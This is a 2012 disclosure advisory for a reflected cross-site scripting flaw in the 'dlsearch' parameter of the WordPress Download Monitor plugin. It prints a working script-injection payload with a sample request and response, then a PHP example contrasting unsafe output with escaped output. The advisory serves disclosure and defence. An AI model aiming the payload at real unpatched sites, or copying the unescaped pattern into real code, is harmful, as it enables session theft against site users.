Wordpress Download Monitor - Download Page Cross-Site Scripting
/-----------------------------------------------------------------\
| Wordpress Download Monitor - Download Page Cross-Site Scripting |
\-----------------------------------------------------------------/
Summary
=======
Wordpress Download Monitor 3.3.5.7 is subject to a cross-site scripting vulnerability. The 'dlsearch' parameter is not sufficiently sanitised before being written to pages that include the '[download_page]' shortcode. An attacker could distribute a malicious URL as part of a phishing campaign. Users following the link would trigger this vulnerability, which could potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine.
CVE number: CVE-2012-4768
Impact: Medium
Vendor homepage: http://mikejolley.com/
Vendor notified: 30/08/2012
Vendor fixed: 30/08/2012
Credit: Chris Cooper and Joseph Sheridan of ReactionIS
This advisory is posted at:
http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
Affected Products
=================
Confirmed in Wordpress Download Monitor 3.3.5.7. Versions prior to 3.3.5.9 may also be affected.
Details
=======
The 'dlsearch' parameter, written to any page or post that includes the '[download_page]' shortcode, was found to be subject to a cross-site scripting vulnerability. It was possible to inject arbitrary JavaScript code into the parameter, which is passed into the page content without sanitisation.
Injecting the following JavaScript code will trigger the vulnerability, causing the page to return a JavaScript alert box:
"><script>alert('xsstest')</script>
---
Example Request:
+---------------
GET /wp/?dlsearch="><script>alert('xsstest')</script> HTTP/1.1
Host: 192.168.0.6
---
Example Response:
+----------------
--- SNIP ---
<form id="download-page-search" action="" method="post">
<p><label for="dlsearch">Search Downloads:</label> <input type="text" name="dlsearch" id="dlsearch" value=""><script>alert('xsstest')
</script>" /><input class="search_submit" type="submit" value="Go" /><input type="hidden" name="page_id" value="2" 
/></p></form><h3>Results found for <em>""><script>alert('xsstest')</script>"</em> <small><a 
href="http://192.168.0.6/wp/">« Downloads</a></small></h3>
--- SNIP ---
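The injection point shown in the response, as an added example that is not the plugin's own code: a hypothetical PHP stand-in for the shortcode's search form, with the unsafe concatenation the advisory describes beside a version escaped with the WordPress core helpers esc_attr(), esc_html() and absint(). Function names are assumptions; the fix shipped in 3.3.5.9 may differ.

```php
<?php
// Added example, not the plugin's own code: a hypothetical stand-in for the
// [download_page] search form that reproduces the fragment in the Example
// Response above, first with the unsafe echo the advisory describes and then
// with every value escaped for the HTML context it lands in.

// Unsafe: $dlsearch is concatenated verbatim into an attribute value and
// into element text. A value beginning with "> closes the attribute early,
// so the remainder is parsed as markup and any <script> it carries runs.
function example_search_form_unsafe( $dlsearch, $page_id ) {
    return '<form id="download-page-search" action="" method="post">'
        . '<p><label for="dlsearch">Search Downloads:</label> '
        . '<input type="text" name="dlsearch" id="dlsearch" value="' . $dlsearch . '" />'
        . '<input class="search_submit" type="submit" value="Go" />'
        . '<input type="hidden" name="page_id" value="' . $page_id . '" /></p></form>'
        . '<h3>Results found for <em>"' . $dlsearch . '"</em></h3>';
}

// Fixed: each interpolated value is escaped for its context with WordPress
// core helpers. esc_attr() encodes quotes and angle brackets inside attribute
// values, esc_html() does the same for element text, and absint() forces the
// hidden page id to a non-negative integer so it cannot carry markup at all.
// For the advisory's payload, esc_attr() yields
// &quot;&gt;&lt;script&gt;alert(&#039;xsstest&#039;)&lt;/script&gt;
// which the browser displays as text instead of executing.
function example_search_form_safe( $dlsearch, $page_id ) {
    return '<form id="download-page-search" action="" method="post">'
        . '<p><label for="dlsearch">Search Downloads:</label> '
        . '<input type="text" name="dlsearch" id="dlsearch" value="' . esc_attr( $dlsearch ) . '" />'
        . '<input class="search_submit" type="submit" value="Go" />'
        . '<input type="hidden" name="page_id" value="' . absint( $page_id ) . '" /></p></form>'
        . '<h3>Results found for <em>"' . esc_html( $dlsearch ) . '"</em></h3>';
}

// Hypothetical shortcode callback wiring the safe renderer to the request.
// stripslashes() undoes the slashes WordPress adds to request values; the
// raw value is never echoed, only passed through the escaping renderer.
function example_download_page_shortcode( $atts ) {
    $dlsearch = isset( $_GET['dlsearch'] ) ? stripslashes( $_GET['dlsearch'] ) : '';
    return example_search_form_safe( $dlsearch, get_the_ID() );
}
add_shortcode( 'download_page', 'example_download_page_shortcode' );
```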
Impact
======
An attacker might entice users to follow a malicious URL, causing JavaScript code to execute in their browser, potentially stealing session cookies, redirecting the user to a malicious URL or downloading malware onto their machine.
Solution
========
Upgrade to Wordpress Download Monitor 3.3.5.9.
Distribution
============
In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients.
* bugtraq () securityfocus com
* full-disclosure () lists grok org uk
Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates:
http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
================================================================================
Reaction Information Security
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF
Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
Joseph Sheridan
Director
CHECK Team Leader, CREST Infrastructure, CREST Application, CISSP
Tel: 07812052515
Web: www.reactionis.com
Email: joe@reactionis.co.uk
Reaction Information Security Limited.
Registered in England No: 6929383
Registered Office: 1, The Mews, 69 New Dover Road, Canterbury, CT1 3DZ